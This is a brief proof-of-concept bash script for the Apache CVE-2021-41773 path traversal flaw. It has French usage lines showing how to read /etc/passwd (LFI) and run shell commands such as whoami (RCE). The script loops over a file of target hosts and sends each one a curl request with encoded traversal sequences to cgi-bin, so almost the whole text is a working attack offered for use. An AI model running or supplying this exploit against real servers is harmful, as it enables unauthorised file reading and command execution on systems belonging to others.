Apache
CVE-2021-41773 (LFI & RCE)
#!/bin/bash
if [[ $1 == '' ]]; [[ $2 == '' ]]; then
echo Set [TAGET-LIST.TXT] [PATH] [COMMAND]
echo ./PoC.sh targets.txt /etc/passwd
exit
fi
for host in $(cat $1); do
echo $host
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
Exploitable ensuite à l’aide des commandes suivantes:
# LFI
bash exploit.sh targets.txt /etc/passwd
# RCE
bash exploit.sh targets.txt /bin/sh whoami